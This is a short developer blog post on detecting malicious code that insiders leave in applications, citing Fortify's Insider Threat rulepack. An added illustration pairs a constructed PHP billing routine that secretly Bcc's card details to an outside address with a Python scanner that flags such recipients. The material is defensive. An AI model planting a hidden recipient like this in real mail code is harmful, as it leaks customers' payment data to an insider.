A web developer’s diary

July 11, 2012

Insider Threat – Detect an insider’s job

Filed under: PHP — Celia @ 4:13 am

In our application security engagements, we frequently look for security loopholes in the application source code. Most of these loopholes stem from assumptions made in the application architecture, high-level design and implementation. But some loopholes are left in the source code intentionally, and for that reason these inside jobs are considered far more malicious.

For example, suppose the application has a mail routine that sends billing details (credit card information) to the invoice admin. What if an employee on the development team adds his own email address to that mail routine so that he can see the credit card numbers and transactions for financial gain? Every time the invoice admin receives an email, this employee also receives the same information in BCC. Since he is on the BCC list, the invoice admin would not notice it. The security consultant might not notice it either, since it can easily be mistaken for a functional requirement.

For this reason, Fortify has come up with a rulepack called ‘Insider Threat RulePack’. The rulepack covers:

1) Email spying
2) Detecting logic bombs in the code
3) Detecting nefarious communication
4) Detecting backdoors
5) Dynamic code injection, etc.

This rulepack makes it easier for the security consultant to detect malicious code left intentionally in the source code.
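To make the email-spying case concrete, here is an added example (not code from the post or from Fortify) of the kind of check such a rule performs: it scans PHP source for hard-coded Cc/Bcc recipients in mail() header strings and in PHPMailer-style addCC()/addBCC() calls, and flags any address whose domain is not on an assumed allowlist of approved recipients. The PHP snippet and the allowlist are constructed for the example.

```python
import re

# Constructed PHP sample (not from the post): a billing mail routine in which a
# developer has slipped an extra hard-coded Bcc recipient into the headers.
SAMPLE_PHP = r'''<?php
function send_invoice($to, $card_last4, $amount) {
    $headers  = "From: billing@example.com\r\n";
    $headers .= "Cc: invoices@example.com\r\n";
    $headers .= "Bcc: dev.leak@example.net\r\n";   // hidden insider recipient
    mail($to, "Invoice", "Card ending $card_last4: $amount", $headers);
}
?>'''

# Assumption: the team maintains an allowlist of domains approved to receive mail.
ALLOWED_DOMAINS = {"example.com"}

# "Cc: ..." / "Bcc: ..." inside a header string literal.
HEADER_RE = re.compile(r'(?i)\b(bcc|cc)\s*:\s*([^\r\n"\']+)')
# PHPMailer-style addCC("...") / addBCC("...") calls with a literal argument.
CALL_RE = re.compile(r'(?i)\badd(bcc|cc)\s*\(\s*["\']([^"\']+)')
EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+')


def find_hidden_recipients(php_source, allowed_domains=ALLOWED_DOMAINS):
    """Return (line_no, header, address) for every hard-coded Cc/Bcc address
    whose domain is not on the allowlist. Addresses built at runtime from
    variables are out of scope for this literal-only check."""
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), start=1):
        for header, value in HEADER_RE.findall(line) + CALL_RE.findall(line):
            for addr in EMAIL_RE.findall(value):
                domain = addr.rsplit("@", 1)[1].lower()
                if domain not in allowed_domains:
                    findings.append((line_no, header.title(), addr))
    return findings


if __name__ == "__main__":
    for line_no, header, addr in find_hidden_recipients(SAMPLE_PHP):
        print(f"line {line_no}: hard-coded {header} recipient {addr} not on allowlist")
```

Running it on the sample reports the Bcc on line 5 and stays silent on the approved Cc; in a real engagement the allowlist would be the one agreed with the business owner, and any literal recipient outside it is worth a manual review.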

More on this rulepack can be found here.



  1. I personally question why you named this particular blog, “Insider Threat – Detect an
    insider's job A web developer's diary”. Either way I actually enjoyed the
    article! Thanks for your effort - Charley

    Comment by http://tinyurl.com/tomaeddy15406 — February 7, 2013 @ 6:42 pm | Reply

